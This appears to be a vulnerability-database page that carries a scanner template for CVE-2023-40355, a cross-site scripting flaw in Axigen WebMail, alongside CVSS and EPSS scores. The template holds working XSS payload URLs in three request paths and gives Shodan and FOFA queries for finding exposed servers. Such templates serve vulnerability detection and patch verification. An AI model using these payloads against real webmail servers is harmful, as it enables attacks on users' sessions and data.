CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
AI Score
Confidence
High
EPSS
Percentile
78.2%
Cross Site Scripting (XSS) vulnerability in Axigen versions 10.3.3.0 before 10.3.3.59, 10.4.0 before 10.4.19, and 10.5.0 before 10.5.5, allows authenticated attackers to execute arbitrary code and obtain sensitive information via the logic for switching between the Standard and Ajax versions.
id: CVE-2023-40355
info:
name: Axigen WebMail - Cross-Site Scripting
author: amir-h-fallahi
severity: medium
description: |
Cross Site Scripting (XSS) vulnerability in Axigen versions 10.3.3.0 before 10.3.3.59, 10.4.0 before 10.4.19, and 10.5.0 before 10.5.5, allows authenticated attackers to execute arbitrary code and obtain sensitive information via the logic for switching between the Standard and Ajax versions.
reference:
- https://www.axigen.com/knowledgebase/Axigen-WebMail-XSS-Vulnerability-CVE-2023-40355-_396.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-40355
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2023-40355
cwe-id: CWE-79
epss-score: 0.00587
epss-percentile: 0.78117
cpe: cpe:2.3:a:axigen:axigen_mobile_webmail:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: axigen
product: axigen_mobile_webmail
shodan-query: http.favicon.hash:-1247684400
fofa-query: icon_hash=-1247684400
tags: cve,cve2023,xss,axigen,webmail
http:
- method: GET
path:
- "{{BaseURL}}/index.hsp?passwordExpired=yes&username=\\'-alert(document.domain),//"
- "{{BaseURL}}/index.hsp?passwordExpired=yes&domainName=\\'-alert(document.domain),//"
- "{{BaseURL}}/index.hsp?m=',alert(document.domain),'"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "\\\\'-alert(document.domain),//"
- "',alert(document.domain),'"
condition: or
- type: dsl
dsl:
- 'contains(header, "text/html")'
- 'contains(response, "Axigen")'
- 'status_code == 200'
condition: and
# digest: 4a0a0047304502201711e917883974fc1055e22022c081d81aefb637222322fc595cf91d992c05b8022100b25c9d8d083dc86f817080e290fe7dd21bbeec43c59b4fb98ba9724d52857b64:922c64590222798bb761d5b6d8e72950
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
AI Score
Confidence
High
EPSS
Percentile
78.2%